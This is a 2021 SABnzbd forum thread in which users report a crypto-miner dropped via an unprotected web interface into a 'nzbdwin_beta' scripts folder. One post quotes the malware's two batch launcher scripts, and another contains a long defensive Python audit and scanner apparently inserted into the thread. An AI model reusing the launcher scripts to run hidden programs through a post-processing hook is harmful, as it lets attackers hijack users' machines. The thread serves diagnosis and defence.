nzbdwin_beta folder: Malware ... coin miner
Posted: April 11th, 2021, 7:45 am
by crispen8
Hi,
Yesterday I got a warning from Bitdefender referencing a program in the nzbdwin_beta folder which appeared in the SABnzbd complete folder.
Is this legit? Or a virus/trojan etc?
The folder gets recreated after I delete it.
I've googled it with no result, and Malwarebytes scan didn't detect any malware/spyware.
Sincerely,
Lowell
Re: nzbdwin_beta folder
Posted: April 11th, 2021, 8:12 am
by safihre
nzbdwin_beta is not something SABnzbd creates.
Or is this maybe the name of one of your folders in Config > Folders?
Re: nzbdwin_beta folder
Posted: April 11th, 2021, 2:27 pm
by crispen8
It was listed in the Config > Folders > Scripts field.
What is the default for this field?
I didn't change this.
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 12:28 am
by safihre
No, it's not default. You can remove it.
Are you really really sure you didn't set that yourself?
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 7:34 am
by imaxst
I noticed this folder the other day after my CPU usage hit 100%. It was running the XMRig miner. I'm not sure where it came from, and I did not run any exe files. I think it must have exploited a post-processing script.
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 7:38 am
by imaxst
From Reddit
So it's a crypto miner. It uses two cron.bat files to have SABnzbd open itself.

@echo off
cd /d %1
start "" "search_indexer.exe" & exit

@echo off
goto start:
########################################
### NZBGET POST-PROCESSING SCRIPT ###
:start
cd /d %NZBPP_DIRECTORY%
start search_indexer.exe
exit /b 93
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 12:58 pm
by safihre
Is your Sabnzbd exposed to the internet without username and password?
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 10:39 am
by imaxst
Not any longer
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 2:12 pm
by sander
imaxst wrote: April 14th, 2021, 10:39 am
Not any longer
Clever!
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 2:16 pm
by sander
Oh, everybody: to avoid this in the future:
1) don't have your SAB web GUI open to the Internet unprotected: at least put a password on it. Plus: put it on a less well-known port, like 49231
2) in SABnzbd, at Unwanted Extensions, fill out EXE, COM, BAT
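A defender's check for the two posts above (the persistence scripts quoted from Reddit, and sander's hardening advice), added here as an example that is not from the original thread or the SABnzbd project: a Python audit that parses a sabnzbd.ini-style file for the weak settings the thread names (no web credentials, default port, no unwanted extensions, script_dir pointing at the dropped folder) and scans a completed-downloads tree for the folder and file names the thread reports plus the launcher pattern shown in the posted cron.bat. The [misc] key names (username, password, port, script_dir, unwanted_extensions) follow SABnzbd's config file as I recall it and should be treated as assumptions; the ini text and the directory contents are constructed samples.

```python
"""Audit a SABnzbd setup for the weaknesses and artefacts discussed in the thread.
Added example, not SABnzbd project code. Config key names are assumptions."""
import configparser
import re
import tempfile
from pathlib import Path

# Names reported in the thread: the dropped folder, the persistence script and the miner binary
SUSPICIOUS_NAMES = {"nzbdwin_beta", "cron.bat", "search_indexer.exe"}
# Launcher line from the posted cron.bat: 'start "" "search_indexer.exe"' or 'start search_indexer.exe'
LAUNCHER_RE = re.compile(r'start\s+(""\s+)?"?search_indexer\.exe', re.IGNORECASE)
# Extensions sander recommends blocking under Unwanted Extensions
REQUIRED_BLOCKED = {"exe", "com", "bat"}

# Constructed sample: the situation described in the thread (key names assumed)
WEAK_INI = """[misc]
port = 8080
username =
password =
script_dir = C:\\Users\\lowell\\Downloads\\complete\\nzbdwin_beta
unwanted_extensions =
"""

# Constructed sample after applying sander's advice
HARDENED_INI = """[misc]
port = 49231
username = lowell
password = !!!encoded!!!placeholder
script_dir = C:\\sabnzbd\\scripts
unwanted_extensions = exe, com, bat
"""


def audit_config(ini_text):
    """Return a list of findings for a sabnzbd.ini-style text (empty list = nothing found)."""
    cp = configparser.ConfigParser(interpolation=None)  # config contains no % interpolation
    cp.read_string(ini_text)
    misc = cp["misc"] if cp.has_section("misc") else {}
    findings = []
    if not misc.get("username", "").strip() or not misc.get("password", "").strip():
        findings.append("web interface has no username/password")
    if misc.get("port", "").strip() == "8080":
        findings.append("web interface on the well-known default port 8080")
    blocked = {e.strip().lower().lstrip(".")
               for e in misc.get("unwanted_extensions", "").split(",") if e.strip()}
    missing = REQUIRED_BLOCKED - blocked
    if missing:
        findings.append("unwanted_extensions does not block: " + ", ".join(sorted(missing)))
    script_dir = misc.get("script_dir", "")
    if "nzbdwin_beta" in script_dir.lower():
        findings.append("script_dir points at the dropped folder: " + script_dir)
    return findings


def scan_tree(root):
    """Walk a download tree and report known names and .bat files that launch the miner."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.name.lower() in SUSPICIOUS_NAMES:
            hits.append("suspicious name: " + str(path))
        if path.is_file() and path.suffix.lower() == ".bat":
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            if LAUNCHER_RE.search(text):
                hits.append("launcher script starting search_indexer.exe: " + str(path))
    return hits


def demo_scan():
    """Build a constructed completed-downloads tree mirroring the thread and scan it."""
    root = Path(tempfile.mkdtemp(prefix="sab_complete_"))
    dropped = root / "nzbdwin_beta"
    dropped.mkdir()
    # Constructed copy of the first cron.bat quoted in the thread
    (dropped / "cron.bat").write_text('@echo off\ncd /d %1\nstart "" "search_indexer.exe" & exit\n')
    (dropped / "search_indexer.exe").write_bytes(b"MZ placeholder, not a real binary")
    benign = root / "Some.Download"
    benign.mkdir()
    (benign / "readme.txt").write_text("nothing to see here\n")
    # Expected: folder name, cron.bat name, cron.bat launcher content, search_indexer.exe name
    return scan_tree(root)


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit_config(ini))
    for hit in demo_scan():
        print(hit)
```

Running it against a real installation means pointing audit_config at the actual sabnzbd.ini and scan_tree at the real complete folder; a finding from audit_config is a setting to change in Config > General and Config > Folders, while a scan hit is a reason to stop SABnzbd, remove the folder and the Scripts entry, and check for a still-running search_indexer.exe process.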
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 3:39 pm
by starmanj
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 15th, 2021, 5:00 am
by sander
starmanj wrote: April 14th, 2021, 3:39 pm
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
cron process? That sounds like Linux, but the malware is Windows (AFAIK) ... so can you explain?